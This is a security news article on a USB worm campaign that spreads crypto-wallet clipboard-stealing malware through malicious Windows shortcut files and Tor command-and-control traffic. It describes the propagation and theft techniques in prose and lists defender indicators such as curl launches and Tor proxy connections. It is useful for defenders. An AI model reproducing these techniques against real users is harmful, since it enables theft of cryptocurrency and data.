USB Worm Spreads Crypto-Stealing Malware via Windows Shortcut Files
A USB worm is spreading clipboard-stealing malware that targets cryptocurrency wallets by abusing Windows shortcut (.LNK) files and using Tor for stealthy C2 communication.
A new USB worm campaign is actively distributing clipboard-stealing malware that targets cryptocurrency wallets, leveraging Windows shortcut (.LNK) files for initial infection and the Tor network to conceal command-and-control (C2) traffic. The campaign, active since at least February 2026, has been detailed by Microsoft researchers who uncovered its sophisticated self-replication mechanism and data-stealing capabilities.
The infection chain begins when a victim opens a malicious LNK file on a USB drive, which triggers the malware to download additional payloads from a .ONION address. Once executed, the malware performs a local scan for document files, hiding the originals and replacing them with malicious shortcuts bearing the same names. This ensures that when users attempt to open their documents, the malware executes again, perpetuating the infection.
The worm component creates a scheduled task that monitors for newly connected USB storage devices. When a removable drive is detected, the malware copies itself to the device and creates additional malicious shortcut files, enabling self-propagation across systems. This worm-like behavior allows the malware to spread rapidly within organizations where USB drives are commonly shared.
The stealer component activates only after verifying that Task Manager is inactive, establishing communication with the C2 server via a Tor executable (ugate.exe). Every half-second, the malware checks the clipboard for cryptocurrency-related data, including 12-word and 24-word BIP39 seed phrases, Ethereum private keys, Bitcoin WIF keys, and wallet addresses for Bitcoin, Ethereum (Tron), and Monero. The targeted addresses are selected based on their starting characters to partially resemble the attacker's wallet addresses, reducing the likelihood of user detection during transactions.
Beyond clipboard monitoring, the malware captures five screenshots of the victim's screen every ten seconds and exfiltrates them to the C2 server using the curl tool. Microsoft also noted support for remote code execution via a C2 EVAL instruction, which downloads and executes JavaScript content on the infected machine.
Microsoft recommends that defenders focus on behavioral indicators rather than signature-based detection. Key red flags include unusual process activity for wscript.exe and cscript.exe, unexpected launches of curl, PowerShell, and cmd.exe, and connections to 'localhost:9050' or other Tor proxy activity. The campaign underscores the evolving threat to cryptocurrency users, combining physical USB vector with network-level stealth to bypass traditional security controls.